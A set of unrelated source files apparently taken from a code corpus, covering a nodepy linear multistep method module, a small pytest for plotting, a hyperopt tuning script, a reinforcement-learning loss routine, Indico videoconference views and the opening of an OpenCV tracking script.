= h ( \beta_k f_{n+k} + ... + \beta_0 f_n )`
Methods are automatically normalized so that \alpha_k=1.
Notes: Representation follows Hairer & Wanner p. 368, NOT Butcher.
**References**:
#. [hairer1993]_ Chapter III
#. [butcher2003]_
"""
def __init__(self,alpha,beta,name='Linear multistep method',shortname='LMM',
description=''):
self.beta = beta /alpha[-1]
self.alpha = alpha/alpha[-1]
self.name = name
self.shortname = shortname
if description is not '':
self.info = description
else:
if self.is_explicit():
exp_str = "Explicit"
else:
exp_str = "Implicit"
self.info = "%s %d-step method of order %d" % (exp_str, len(self), self.order())
def __num__(self):
"""
Returns a copy of the method but with floating-point coefficients.
This is useful whenever we need to operate numerically without
worrying about the representation of the method.
"""
import copy
numself = copy.deepcopy(self)
if self.alpha.dtype==object:
numself.alpha=np.array(self.alpha,dtype=np.float64)
numself.beta=np.array(self.beta,dtype=np.float64)
return numself
def characteristic_polynomials(self):
r"""
Returns the characteristic polynomials (also known as generating
polynomials) of a linear multistep method. They are:
`\rho(z) = \sum_{j=0}^k \alpha_k z^k`
`\sigma(z) = \sum_{j=0}^k \beta_k z^k`
**Examples**::
>>> from nodepy import lm
>>> ab5 = lm.Adams_Bashforth(5)
>>> rho,sigma = ab5.characteristic_polynomials()
>>> print(rho)
5 4
1 x - 1 x
>>> print(sigma)
4 3 2
2.64 x - 3.853 x + 3.633 x - 1.769 x + 0.3486
**References**:
#. [hairer1993]_ p. 370, eq. 2.4
"""
rho=np.poly1d(self.alpha[::-1])
sigma=np.poly1d(self.beta[::-1])
return rho, sigma
def order(self,tol=1.e-10):
r""" Return the order of the local truncation error of a linear multistep method.
**Examples**::
>>> from nodepy import lm
>>> am3=lm.Adams_Moulton(3)
>>> am3.order()
4
"""
p = 0
while True:
if self._satisfies_order_conditions(p+1,tol):
p = p + 1
else:
return p
def _satisfies_order_conditions(self,p,tol):
""" Return True if the linear multistep method satisfies
the conditions of order p (only) """
ii=snp.arange(len(self.alpha))
return abs(sum(ii**p*self.alpha-p*self.beta*ii**(p-1)))<tol
def absolute_monotonicity_radius(self):
return self.ssp_coefficient()
@property
def p(self):
return self.order()
def latex(self):
r"""
Print a LaTeX representation of a linear multistep formula.
**Example**::
>>> from nodepy import lm
>>> print(lm.Adams_Bashforth(2).latex())
\begin{align} y_{n + 2} - y_{n + 1} = \frac{3}{2}h f(y_{n + 1}) - \frac{1}{2}h f(y_{n})\end{align}
"""
from sympy import symbols, latex
n = symbols('n')
from nodepy.snp import printable
k = len(self)
alpha_terms = []
beta_terms = []
for i in range(k+1):
subscript = latex(n+k-i)
if self.alpha[k-i] != 0:
alpha_terms.append(printable(self.alpha[k-i],return_one=False) +
' y_{'+subscript+'}')
if self.beta[k-i] != 0:
beta_terms.append(printable(self.beta[k-i],return_one=False) +
'h f(y_{'+subscript+'})')
lhs = ' + '.join(alpha_terms)
rhs = ' + '.join(beta_terms)
s = r'\begin{align}'+ ' = '.join([lhs,rhs]) + r'\end{align}'
s = s.replace('+ -','-')
return s
def ssp_coefficient(self):
r""" Return the SSP coefficient of the method.
The SSP coefficient is given by
`\min_{0 \le j < k} -\alpha_k/beta_k`
if `\alpha_j<0` and `\beta_j>0` for all `j`, and is equal to
zero otherwise.
**Examples**::
>>> from nodepy import lm
>>> ssp32=lm.elm_ssp2(3)
>>> ssp32.ssp_coefficient()
1/2
>>> bdf2=lm.backward_difference_formula(2)
>>> bdf2.ssp_coefficient()
0
"""
if np.any(self.alpha[:-1]>0) or np.any(self.beta<0):
return 0
return min([-self.alpha[j]/self.beta[j]
for j in range(len(self.alpha)-1) if self.beta[j]!=0])
def plot_stability_region(self,N=100,bounds=None,color='r',filled=True, alpha=1.,
to_file=False,longtitle=False):
r"""
The region of absolute stability of a linear multistep method is
the set
`\{ z \in C : \rho(\zeta) - z \sigma(zeta) \text{ satisfies the root condition} \}`
where `\rho(zeta)` and `\sigma(zeta)` are the characteristic
functions of the method.
Also plots the boundary locus, which is
given by the set of points z:
`\{z | z=\rho(\exp(i\theta))/\sigma(\exp(i\theta)), 0\le \theta \le 2*\pi \}`
Here `\rho` and `\sigma` are the characteristic polynomials
of the method.
References:
[leveque2007]_ section 7.6.1
**Input**: (all optional)
- N -- Number of gridpoints to use in each direction
- bounds -- limits of plotting region
- color -- color to use for this plot
- filled -- if true, stability region is filled in (solid); otherwise it is outlined
"""
import matplotlib.pyplot as plt
rho, sigma = self.__num__().characteristic_polynomials()
mag = lambda z: _root_condition(rho-z*sigma)
vmag = np.vectorize(mag)
z = self._boundary_locus()
if bounds is None:
# Use boundary locus to decide plot region
realmax, realmin = np.max(np.real(z)), np.min(np.real(z))
imagmax, imagmin = np.max(np.imag(z)), np.min(np.imag(z))
deltar, deltai = realmax-realmin, imagmax-imagmin
bounds = (realmin-deltar/5.,realmax+deltar/5.,
imagmin-deltai/5.,imagmax+deltai/5.)
y=np.linspace(bounds[2],bounds[3],N)
Y=np.tile(y[:,np.newaxis],(1,N))
x=np.linspace(bounds[0],bounds[1],N)
X=np.tile(x,(N,1))
Z=X+Y*1j
R=1.5-vmag(Z)
if filled:
plt.contourf(X,Y,R,[0,1],colors=color,alpha=alpha)
else:
plt.contour(X,Y,R,[0,1],colors=color,alpha=alpha)
fig = plt.gcf()
ax = fig.get_axes()
if longtitle:
plt.setp(ax,title='Absolute Stability Region for '+self.name)
else:
plt.setp(ax,title='Stability region')
plt.plot([0,0],[bounds[2],bounds[3]],'--k',linewidth=2)
plt.plot([bounds[0],bounds[1]],[0,0],'--k',linewidth=2)
plt.plot(np.real(z),np.imag(z),color='k',linewidth=3)
plt.axis(bounds)
plt.axis('image')
if to_file:
plt.savefig(to_file, transparent=True, bbox_inches='tight', pad_inches=0.3)
plt.draw()
return fig
def plot_boundary_locus(self,N=1000,figsize=None):
r"""Plot the boundary locus, which is
given by the set of points
`\{z | z=\rho(\exp(i\theta))/\sigma(\exp(i\theta)), 0\le \theta \le 2*\pi \}`
where `\rho` and `\sigma` are the characteristic polynomials
of the method.
References:
[leveque2007]_ section 7.6.1
"""
import matplotlib.pyplot as plt
z = self._boundary_locus(N)
if figsize is None:
plt.figure()
else:
plt.figure(figsize=figsize)
plt.plot(np.real(z),np.imag(z),color='k',linewidth=3)
plt.axis('image')
bounds = plt.axis()
plt.plot([0,0],[bounds[2],bounds[3]],'--k',linewidth=2)
plt.plot([bounds[0],bounds[1]],[0,0],'--k',linewidth=2)
plt.title('Boundary locus for '+self.name)
plt.draw()
def _boundary_locus(self, N=1000):
r"""Compute the boundary locus, which is
given by the set of points
`\{z | z=\rho(\exp(i\theta))/\sigma(\exp(i\theta)), 0\le \theta \le 2*\pi \}`
where `\rho` and `\sigma` are the characteristic polynomials
of the method.
References:
[leveque2007]_ section 7.6.1
"""
theta=np.linspace(0.,2*np.pi,N)
zeta = np.exp(theta*1j)
rho,sigma=self.__num__().characteristic_polynomials()
z = rho(zeta)/sigma(zeta)
return z
def A_alpha_stability(self, N=1000, tol=1.e-14):
r"""Angle of `A(\alpha)`-stability.
The result is given in degrees. The result is only accurate to
about 1 degree, so we round down.
**Examples**:
>>> from nodepy import lm
>>> bdf5 = lm.backward_difference_formula(5)
>>> bdf5.A_alpha_stability()
51
"""
from math import atan2, floor
z = self._boundary_locus(N)
rad = list(map(atan2,np.imag(z),np.real(z)))
rad = np.mod(np.array(rad),2*np.pi)
return min(int(floor(np.min(np.abs(np.where(np.real(z)<-tol,rad,1.e99)-np.pi))/np.pi*180)),90)
def is_explicit(self):
return self.beta[-1]==0
def is_zero_stable(self,tol=1.e-13):
r""" True if the method is zero-stable.
**Examples**::
>>> from nodepy import lm
>>> bdf5=lm.backward_difference_formula(5)
>>> bdf5.is_zero_stable()
True
"""
rho, sigma = self.characteristic_polynomials()
return _root_condition(rho,tol)
def __len__(self):
r"""Returns the number of steps used."""
return len(self.alpha)-1
class AdditiveLinearMultistepMethod(GeneralLinearMethod):
r"""
Method for solving equations of the form
`y'(t) = f(y) + g(y)`
The method takes the form
`\alpha_k y_{n+k} + \alpha_{k-1} y_{n+k-1} + ... + \alpha_0 y_n
= h ( \beta_k f_{n+k} + ... + \beta_0 f_n
+ \gamma_k f_{n+k} + ... + \gamma_0 f_n )`
Methods are automatically normalized so that \alpha_k=1.
The usual reference for these is Ascher, Ruuth, and Whetton.
But we follow a different notation (as just described).
"""
def __init__(self, alpha, beta, gamma, name='Additive linear multistep method'):
self.beta = beta /alpha[-1]
self.gamma = gamma/alpha[-1]
self.alpha = alpha/alpha[-1]
self.name = name
self.method1 = LinearMultistepMethod(alpha, beta)
self.method2 = LinearMultistepMethod(alpha, gamma)
def __num__(self):
"""
Returns a copy of the method but with floating-point coefficients.
This is useful whenever we need to operate numerically without
worrying about the representation of the method.
"""
import copy
numself = copy.deepcopy(self)
if self.alpha.dtype == object:
numself.alpha = np.array(self.alpha, dtype=np.float64)
numself.beta = np.array(self.beta, dtype=np.float64)
numself.gamma = np.array(self.gamma, dtype=np.float64)
return numself
def order(self,tol=1.e-10):
r""" Return the order of the local truncation error of an additive
linear multistep method. The output is the minimum of the
order of the component methods.
"""
orders = []
for method in (self.method1,self.method2):
p = 0
while True:
if method._satisfies_order_conditions(p+1,tol):
p = p + 1
else:
orders.append(p)
break
return min(orders)
def plot_imex_stability_region(self,both_real=False,N=100,color='r',filled=True,
alpha=1.,fignum=None,bounds=[-10, 1, -5, 5]):
r"""
**Input**: (all optional)
- N -- Number of gridpoints to use in each direction
- bounds -- limits of plotting region
- color -- color to use for this plot
- filled -- if true, stability region is filled in (solid); otherwise it is outlined
"""
import matplotlib.pyplot as plt
rho, sigma1 = self.method1.__num__().characteristic_polynomials()
rho, sigma2 = self.method2.__num__().characteristic_polynomials()
if both_real:
mag = lambda a, b: _max_root(rho - a*sigma1 - b*sigma2)
else:
mag = lambda a, b: _max_root(rho - a*sigma1 - 1j*b*sigma2)
vmag = np.vectorize(mag)
y = np.linspace(bounds[2],bounds[3],N)
Y = np.tile(y[:,np.newaxis],(1,N))
x = np.linspace(bounds[0],bounds[1],N)
X = np.tile(x,(N,1))
R = vmag(X,Y)
h = plt.figure(fignum)
if filled:
plt.contourf(X,Y,R,[0,1],colors=color,alpha=alpha)
else:
plt.contour(X,Y,R,[0,1],colors=color,alpha=alpha)
plt.contour(X,Y,R,np.linspace(0,1,10),colors='k')
plt.title('IMEX Stability Region for '+self.name)
plt.plot([0,0],[bounds[2],bounds[3]],'--k',linewidth=2)
plt.plot([bounds[0],bounds[1]],[0,0],'--k',linewidth=2)
plt.axis(bounds)
return h
def stiff_damping_factor(self,epsilon=1.e-7):
r"""
Return the magnitude of the largest root at z=-inf.
This routine just computes a numerical approximation
to the true value (with absolute accuracy epsilon).
"""
rho, sigma1 = self.method1.__num__().characteristic_polynomials()
rho, sigma2 = self.method2.__num__().characteristic_polynomials()
mag = lambda a, b: _max_root(rho - a*sigma1 - 1j*b*sigma2)
f=[]
z=-1.
f.append(mag(z,0))
while True:
z = z*10.
f.append(mag(z,0))
if np.abs(f[-1]-f[-2]) < epsilon:
return f[-1]
if len(f)>100:
print(f)
raise Exception('Unable to compute stiff damping factor: slow convergence')
# ======================================================
def _max_root(p):
return max(np.abs(p.r))
def _root_condition(p,tol=1.e-13):
r""" True if the polynomial `p` has all roots inside
the unit circle and roots on the boundary of the unit circle
are simple.
**Examples**::
>>> from nodepy import lm
>>> p = np.poly1d((1,0.4,2,0.5))
>>> lm._root_condition(p)
False
"""
if max(np.abs(p.r))>(1+tol):
return False
mod_one_roots = [r for r in p.r if abs(abs(r)-1)<tol]
for i,r1 in enumerate(mod_one_roots):
for r2 in mod_one_roots[i+1:]:
if abs(r1-r2)<tol:
return False
return True
# ======================================================
# Families of multistep methods
# ======================================================
def Adams_Bashforth(k):
r"""
Construct the k-step, Adams-Bashforth method.
The methods are explicit and have order k.
They have the form:
`y_{n+1} = y_n + h \sum_{j=0}^{k-1} \beta_j f(y_n-k+j+1)`
They are generated using equations (1.5) and (1.7) from
[hairer1993]_ III.1, along with the binomial expansion.
**Examples**::
>>> import nodepy.linear_multistep_method as lm
>>> ab3=lm.Adams_Bashforth(3)
>>> ab3.order()
3
References:
#. [hairer1993]_
"""
import sympy
from sympy import Rational
one = Rational(1,1)
alpha=snp.zeros(k+1)
beta=snp.zeros(k+1)
alpha[k]=one
alpha[k-1]=-one
gamma=snp.zeros(k)
gamma[0]=one
beta[k-1]=one
betaj=snp.zeros(k+1)
for j in range(1,k):
gamma[j]=one-sum(gamma[:j]/snp.arange(j+1,1,-1))
for i in range(0,j+1):
betaj[k-i-1]=(-one)**i*sympy.combinatorial.factorials.binomial(j,i)*gamma[j]
beta=beta+betaj
name=str(k)+'-step Adams-Bashforth'
return LinearMultistepMethod(alpha,beta,name=name,shortname='AB'+str(k))
def Nystrom(k):
r"""
Construct the k-step explicit Nystrom linear multistep method.
The methods are explicit and have order k.
They have the form:
`y_{n+1} = y_{n-1} + h \sum_{j=0}^{k-1} \beta_j f(y_n-k+j+1)`
They are generated using equations (1.13) and (1.7) from
[hairer1993]_ III.1, along with the binomial expansion
and the relation in exercise 4 on p. 367.
Note that the term "Nystrom method" is also commonly used to refer
to a class of methods for second-order ODEs; those are NOT
the methods generated by this function.
**Examples**::
>>> import nodepy.linear_multistep_method as lm
>>> nys3=lm.Nystrom(6)
>>> nys3.order()
6
References:
#. [hairer1993]_
"""
import sympy
from sympy import Rational
one = Rational(1,1)
alpha = snp.zeros(k+1)
alpha[k] = one
alpha[k-2] = -one
beta = snp.zeros(k+1)
kappa = snp.zeros(k)
gamma = snp.zeros(k)
gamma[0] = one
kappa[0] = 2*one
beta[k-1] = 2*one
betaj = snp.zeros(k+1)
for j in range(1,k):
gamma[j] = one-sum(gamma[:j]/snp.arange(j+1,1,-1))
kappa[j] = 2 * gamma[j] - gamma[j-1]
for i in range(0,j+1):
betaj[k-i-1] = (-one)**i*sympy.combinatorial.factorials.binomial(j,i)*kappa[j]
beta = beta+betaj
name = str(k)+'-step Nystrom'
return LinearMultistepMethod(alpha,beta,name=name,shortname='Nys'+str(k))
def Adams_Moulton(k):
r"""
Construct the k-step, Adams-Moulton method.
The methods are implicit and have order k+1.
They have the form:
`y_{n+1} = y_n + h \sum_{j=0}^{k} \beta_j f(y_n-k+j+1)`
They are generated using equation (1.9) and the equation in
Exercise 3 from Hairer & Wanner III.1, along with the binomial
expansion.
**Examples**::
>>> import nodepy.linear_multistep_method as lm
>>> am3=lm.Adams_Moulton(3)
>>> am3.order()
4
References:
[hairer1993]_
"""
import sympy
alpha=snp.zeros(k+1)
beta=snp.zeros(k+1)
alpha[k]=1
alpha[k-1]=-1
gamma=snp.zeros(k+1)
gamma[0]=1
beta[k]=1
betaj=snp.zeros(k+1)
for j in range(1,k+1):
gamma[j]= -sum(gamma[:j]/snp.arange(j+1,1,-1))
for i in range(0,j+1):
betaj[k-i]=(-1)**i*sympy.combinatorial.factorials.binomial(j,i)*gamma[j]
beta=beta+betaj
name=str(k)+'-step Adams-Moulton'
return LinearMultistepMethod(alpha,beta,name=name,shortname='AM'+str(k))
def Milne_Simpson(k):
r"""
Construct the k-step, Milne-Simpson method.
The methods are implicit and (for k>=3) have order k+1.
They have the form:
`y_{n+1} = y_{n-1} + h \sum_{j=0}^{k} \beta_j f(y_n-k+j+1)`
They are generated using equation (1.15), the equation in
Exercise 3, and the relation in exercise 4, all from Hairer & Wanner
III.1, along with the binomial expansion.
**Examples**::
>>> import nodepy.linear_multistep_method as lm
>>> ms3=lm.Milne_Simpson(3)
>>> ms3.order()
4
References:
[hairer1993]_
"""
import sympy
alpha = snp.zeros(k+1)
beta = snp.zeros(k+1)
alpha[k] = 1
alpha[k-2] = -1
gamma = snp.zeros(k+1)
kappa = snp.zeros(k+1)
gamma[0] = 1
kappa[0] = 2
beta[k] = 2
betaj = snp.zeros(k+1)
for j in range(1,k+1):
gamma[j] = -sum(gamma[:j]/snp.arange(j+1,1,-1))
kappa[j] = 2 * gamma[j] - gamma[j-1]
for i in range(0,j+1):
betaj[k-i] = (-1)**i*sympy.combinatorial.factorials.binomial(j,i)*kappa[j]
beta = beta+betaj
name = str(k)+'-step Milne-Simpson'
return LinearMultistepMethod(alpha,beta,name=name,shortname='MS'+str(k))
def backward_difference_formula(k):
r"""
Construct the k-step backward differentiation method.
The methods are implicit and have order k.
They have the form:
`\sum_{j=0}^{k} \alpha_j y_{n+k-j+1} = h \beta_j f(y_{n+1})`
They are generated using equation (1.22') from Hairer & Wanner III.1,
along with the binomial expansion.
**Examples**::
>>> import nodepy.linear_multistep_method as lm
>>> bdf4=lm.backward_difference_formula(4)
>>> bdf4.A_alpha_stability()
73
**References**:
#.[hairer1993]_ pp. 364-365
"""
import sympy
alpha=snp.zeros(k+1)
beta=snp.zeros(k+1)
beta[k]=1
gamma=snp.zeros(k+1)
gamma[0]=1
alphaj=snp.zeros(k+1)
for j in range(1,k+1):
gamma[j]= sympy.Rational(1,j)
for i in range(0,j+1):
alphaj[k-i]=(-1)**i*sympy.combinatorial.factorials.binomial(j,i)*gamma[j]
alpha=alpha+alphaj
name=str(k)+'-step BDF'
return LinearMultistepMethod(alpha,beta,name=name,shortname='BDF'+str(k))
def elm_ssp2(k):
r"""
Returns the optimal SSP k-step linear multistep method of order 2.
**Examples**::
>>> import nodepy.linear_multistep_method as lm
>>> lm10=lm.elm_ssp2(10)
>>> lm10.ssp_coefficient()
8/9
"""
import sympy
alpha=snp.zeros(k+1)
beta=snp.zeros(k+1)
alpha[-1]=sympy.Rational(1,1)
alpha[0]=sympy.Rational(-1,(k-1)**2)
alpha[k-1]=sympy.Rational(-(k-1)**2+1,(k-1)**2)
beta[k-1]=sympy.Rational(k,k-1)
name='Optimal '+str(k)+'-step, 2nd order SSP method.'
return LinearMultistepMethod(alpha,beta,name=name)
def sand_cc(s):
r""" Construct Sand's circle-contractive method of order `p=2(s+1)`
that uses `2^s + 1` steps.
**Examples**::
>>> import nodepy.linear_multistep_method as lm
>>> cc4 = lm.sand_cc(4)
>>> cc4.order()
10
>>> cc4.ssp_coefficient()
1/8
**References**:
#. [sand1986]_
"""
import sympy
one = sympy.Rational(1)
zero = sympy.Rational(0)
k = 2**s + 1
Jn = [k,k-1]
for i in range(1,s+1):
Jn.append(k-1-2**i)
alpha = snp.zeros(k+1)
beta = snp.zeros(k+1)
# This is inefficient
for j in Jn:
tau_product = one
tau_sum = zero
tau = [one/(j-i) for i in Jn if i!=j]
tau_product = np.prod(tau)
tau_sum = np.sum(tau)
beta[j] = tau_product**2
alpha[j] = 2*beta[j]*tau_sum
return LinearMultistepMethod(alpha,beta,'Sand circle-contractive')
def arw2(gam,c):
r"""Returns the second order IMEX additive multistep method based on the
parametrization in Section 3.2 of Ascher, Ruuth, & Whetton. The parameters
are gam and c. Known methods are obtained with the following values:
(1/2,0): CNAB
(1/2,1/8): MCNAB
(0,1): CNLF
(1,0): SBDF
**Examples**::
>>> from nodepy import lm
>>> import sympy
>>> CNLF = lm.arw2(0,sympy.Rational(1))
>>> CNLF.order()
2
>>> CNLF.method1.ssp_coefficient()
1
>>> CNLF.method2.ssp_coefficient()
0
>>> print(CNLF.stiff_damping_factor()) #doctest: +ELLIPSIS
0.999...
"""
half = sympy.Rational(1,2)
alpha = snp.array([gam-half,-2*gam,gam+half])
beta = snp.array([c/2,1-gam-c,gam+c/2]) # implicit part
gamma = snp.array([-gam,gam+1,0]) # explicit part
return AdditiveLinearMultistepMethod(alpha,beta,gamma,'ARW2('+str(gam)+','+str(c)+')')
def arw3(gam,theta,c):
r"""Returns the third order IMEX additive multistep method based on the
parametrization in Section 3.3 of Ascher, Ruuth, & Whetton. The parameters
are gamma, theta, and c. Known methods are obtained with the following values:
(1,0,0): SBDF3
Note that there is one sign error in the ARW paper; it is corrected here.
"""
half = sympy.Rational(1,2)
third = sympy.Rational(1,3)
alpha = snp.array([-half*gam**2+third/2, 3*half*gam**2+gam-1, -3*half*gam**2-2*gam+half-theta,
half*gam**2+gam+third+theta])
beta = snp.array([5*half/6*theta-c, (gam**2-gam)*half+3*c-4*theta*third, 1-gam**2-3*c+23*theta*third/4,
(gam**2+gam)*half+c])
gamma = snp.array([(gam**2+gam)*half+5*theta*third/4, -gam**2-2*gam-4*theta*third,
(gam**2+3*gam)*half+1+23*theta*third/4,0])
return AdditiveLinearMultistepMethod(alpha,beta,gamma,'ARW3('+str(gam)+','+str(theta)+','+str(c)+')')
def loadLMM(which='All'):
"""
Load a set of standard linear multistep methods for testing.
**Examples**::
>>> from nodepy import lm
>>> ebdf5 = lm.loadLMM('eBDF5')
>>> ebdf5.is_zero_stable()
True
"""
LM={}
# ================================================
alpha = snp.array([-12,75,-200,300,-300,137])/sympy.Rational(137,1)
beta = snp.array([60,-300,600,-600,300,0])/sympy.Rational(137,1)
LM['eBDF5'] = LinearMultistepMethod(alpha,beta,'eBDF 5')
# ================================================
theta = sympy.Rational(1,2)
alpha = snp.array([-1,1])
beta = snp.array([1-theta,theta])
gamma = snp.array([1,0])
LM['ET112'] = AdditiveLinearMultistepMethod(alpha,beta,gamma,'Euler-Theta')
# ================================================
if which=='All':
return LM
else:
return LM[which]
if __name__ == "__main__":
import doctest
doctest.testmod()
| StarcoderdataPython |
8097961 | from chembee.graphics import polar_plot
from chembee.processing import load_data
import os
import sys
import pytest
from pathlib import Path
@pytest.fixture(scope="module")
def script_loc(request):
"""Return the directory of the currently running test script"""
return Path(request.fspath).parent
def test_polar_plot(script_loc):
frame = load_data(script_loc.joinpath("data/Biodeg.sdf"))
polar_plot(frame, save_path=script_loc.joinpath("plots/"))
| StarcoderdataPython |
355794 | <filename>SourceCode/ModelSystem/Models/hyperopt.py
from sklearn.model_selection import cross_val_score
from hyperopt import hp,STATUS_OK,Trials,fmin,tpe
from sklearn.ensemble import RandomForestClassifier
import pickle
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.metrics import cohen_kappa_score
from sklearn.linear_model import LinearRegression
from sklearn.svm import SVC
from sklearn.linear_model import Ridge
from kappa import quadratic_weighted_kappa
x_train_path = "./X_train.pickle"
with open(x_train_path,"rb") as f:
x_train = pickle.load(f)
y_train_path = "./Y_train.pickle"
with open(y_train_path,"rb") as f:
y_train = pickle.load(f)
hist = np.bincount(y_train)
cdf = np.cumsum(hist) / float(sum(hist))
'''
from sklearn.model_selection import train_test_split
x_train,x_test,y_train,y_test = train_test_split(\
x_train,y_train,test_size = 0.3,random_state = 0)
'''
sz = 7000
x_test = x_train[sz:]
y_test = y_train[sz:]
x_train = x_train[:sz]
y_train = y_train[:sz]
#获取样本权重
def getWeights():
import pandas as pd
dfTrain =pd.read_csv('./ModelSystem/RawData/train.csv')
var = list(dfTrain["relevance_variance"])
weights = []
for v in var:
weights.append(1/(float(v) + 1.0))
weights = np.array(weights,dtype=float)
#print(weights)
print("Get Weight Success")
return weights[:sz]
def hyperopt_train_test(params):
#model chosen
# clf = RandomForestClassifier(**params, n_jobs=8, max_features='auto', max_depth=None, criterion='gini')
# clf = SVC(**params)
# clf.fit(x_train,y_train,sample_weight=getWeights())
# Y_predict=clf.predict(x_test)
# clf=xgb(**params,n_jobs=8)
# clf= LinearRegression(**params,n_jobs=-1)
clf = Ridge(**params)
return cross_val_score(clf, x_train, y_train).mean()
# return quadratic_weighted_kappa(Y_predict,y_test)
best = 0
space = {
#SVM para
# 'C': hp.uniform('C', 0, 200),
# 'kernel': hp.choice('kernel', ['linear', 'sigmoid', 'poly', 'rbf']),
# 'gamma': hp.uniform('gamma', 0, 200),
#RF para
# 'n_estimators': hp.choice('n_estimators', range(100,500)),
# 'min_samples_leaf':hp.choice('min_samples_leaf',range(1,10)),
# 'min_samples_split':hp.uniform('min_samples_split',0,0.99),
# XGBoost para
# 'learning_rate':hp.uniform('learning_rate',0.01,0.2),
# 'max_depth':hp.choice('max_depth',range(3,10)),
# 'n_estimator':hp.choice('n_estimator',range(100,1000)),
# LR para
# Ridge para
'alpha':hp.uniform('alpha',0.001,0.999),
'max_iter':hp.choice('max_iter',500,5000),
'solver':hp.choice('solver',['auto','svd','cholesky','lsqr','sparse_cg','sag'])
}
def f(params):
global best
acc = hyperopt_train_test(params)
if acc > best:
best = acc
print('new best:', best, params)
return {'loss': -acc, 'status': STATUS_OK}
trials = Trials()
# chosen max_evals
best = fmin(f, space, algo=tpe.suggest, max_evals=300, trials=trials)
# import os
#save best
doc=open('SVR_best.txt','a+')
print('best:', best)
print('best:', best,file=doc)
doc.close()
###################################
| StarcoderdataPython |
9798586 | <filename>egg/zoo/gym-game/models/compute_loss.py
import argparse
import numpy as np
import torch
import random
import comm_game_config as configs
from modules.model import AgentModule
from modules.random_model import RandomAgentModule
from modules.comm_game import GameModule
from collections import defaultdict
import json
import pdb
from tqdm import tqdm
STUDENT = 1
TEACHER = 0
def discounted_cumsum_right(single_round, gamma):
"""
Performs a right discounted cumulative sum
:param single_round: 1 x N
:param gamma:
:return:
"""
transposed_round = torch.transpose(torch.fliplr(single_round), 0, 1)
returns = torch.zeros_like(transposed_round)
R = torch.zeros(single_round.shape[0])
for i, r in enumerate(transposed_round):
R = r + gamma * R
returns[i] = R
return torch.fliplr(torch.transpose(returns, 0, 1))
def discount_rewards(rewards, teach_iters, test_iters, gamma):
"""
Returns discounted future rewards
:param rewards:
:param discount_factor:
:return:
"""
returns = torch.zeros_like(rewards)
if teach_iters > 0:
teaching_round = rewards[:,:,:teach_iters]
# it can't handle batches
for i, single_round in enumerate(teaching_round):
returns[i,:,:teach_iters] = discounted_cumsum_right(single_round, gamma)
# 3 test maps
for test_round in range(3):
start = teach_iters + (test_round * test_iters)
end = start + test_iters
# print('rewards shape', rewards.shape)
test_round = rewards[:,:,start:end]
for i, single_round in enumerate(test_round):
returns[i,:,start:end] = discounted_cumsum_right(single_round, gamma)
return returns
def get_loss(game, subtract_baseline=True, entropy_term=True, entropy_beta=0.1, discount_factor=1):
"""
Returns sum of total future loss at each time step.
:param game:
:param subtract_baseline: (bool) if True, subtracts the mean divide by (stdev + eps)
:param entropy_term: (bool) if True, adds a entropy_beta * avg. action distribution entropy over the round.
:param discount_factor: (0 < float < 1)
:return: total_loss, total_student_loss, total_teacher_loss
"""
max_teach_iters = game.max_teach_iters
max_test_iters = game.max_test_iters
# Process rewards
# print('loss:45')
rewards = game.memories['rewards']
total_rewards = torch.sum(rewards, dim=[0, 2])
# print('Rewards')
# print(rewards[:,STUDENT])
discounted_future_returns = discount_rewards(rewards, max_teach_iters, max_test_iters, discount_factor)
# print('Discounted future returns')
# print(discounted_future_returns[:,STUDENT])
# print('batched discounted returns shape', discounted_future_returns.shape)
# print('loss:48')
if subtract_baseline:
# calculate mean over all batches
mean, std = torch.mean(discounted_future_returns, dim=[0,2]), torch.std(discounted_future_returns, dim=2)
discounted_future_returns = torch.sub(discounted_future_returns, mean.unsqueeze(0).unsqueeze(2))
# Process log probs, loss
log_probs = game.memories['log_probs']
student_log_probs = log_probs[:, STUDENT]
total_student_loss = torch.sum(torch.mul(-1 * student_log_probs, discounted_future_returns[:,STUDENT]), [0,1])
# print('TOTAL STUDENT LOSS', total_student_loss)
total_teacher_loss = torch.tensor(0.0)
avg_student_entropy = torch.mean(game.memories['entropy'][:, STUDENT])
avg_teacher_entropy = torch.mean(game.memories['entropy'][:, TEACHER])
if entropy_term:
total_student_loss -= avg_student_entropy * entropy_beta
# print('loss:57')
if max_teach_iters > 0:
teacher_log_probs = log_probs[:, TEACHER]
total_teacher_loss = torch.sum(torch.mul(-1 * teacher_log_probs, discounted_future_returns[:,TEACHER]), [0,1])
if entropy_term:
total_teacher_loss -= torch.mean(game.memories['entropy'][:, TEACHER]) * entropy_beta
total_loss = total_teacher_loss + total_student_loss
# print('TOTAL LOSS', total_loss)
# print('loss:60')
return total_loss, total_teacher_loss, total_student_loss, torch.sum(total_rewards), \
total_rewards[TEACHER], total_rewards[STUDENT], avg_teacher_entropy, avg_student_entropy
| StarcoderdataPython |
6506549 | from .torch_model import TorchModel
from .training import Train | StarcoderdataPython |
8063495 | # This file is part of Indico.
# Copyright (C) 2002 - 2021 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from indico.modules.events.management.views import WPEventManagement
from indico.modules.events.views import WPConferenceDisplayBase
from indico.util.i18n import _
from indico.web.breadcrumbs import render_breadcrumbs
from indico.web.views import WPDecorated, WPJinjaMixin
class WPVCManageEvent(WPEventManagement):
sidemenu_option = 'videoconference'
template_prefix = 'vc/'
bundles = ('module_vc.js', 'module_vc.css')
class WPVCEventPage(WPConferenceDisplayBase):
menu_entry_name = 'videoconference_rooms'
template_prefix = 'vc/'
bundles = ('module_vc.js', 'module_vc.css')
class WPVCService(WPJinjaMixin, WPDecorated):
template_prefix = 'vc/'
def _get_breadcrumbs(self):
return render_breadcrumbs(_('Videoconference'))
def _get_body(self, params):
return self._get_page_content(params)
| StarcoderdataPython |
12830676 | <filename>OLD THINGS/prac.py
#!/usr/bin/python
#
# Copyright 2018 BIG VISION LLC ALL RIGHTS RESERVED
#
from __future__ import print_function
import sys
import cv2
from random import randint
import argparse
import numpy as np
import cv2 as cv
from yolo_utils import infer_image
#Amir
from mtcnn.mtcnn import MTCNN
from skimage.measure import compare_ssim
from skimage.transform import resize
import glob
from FaceID import FaceID
#import face_recognition
trackerTypes = ['BOOSTING', 'MIL', 'KCF','TLD', 'MEDIANFLOW', 'GOTURN', 'MOSSE', 'CSRT']
def createTrackerByName(trackerType):
# Create a tracker based on tracker name
if trackerType == trackerTypes[0]:
tracker = cv2.TrackerBoosting_create()
elif trackerType == trackerTypes[1]:
tracker = cv2.TrackerMIL_create()
elif trackerType == trackerTypes[2]:
tracker = cv2.TrackerKCF_create()
elif trackerType == trackerTypes[3]:
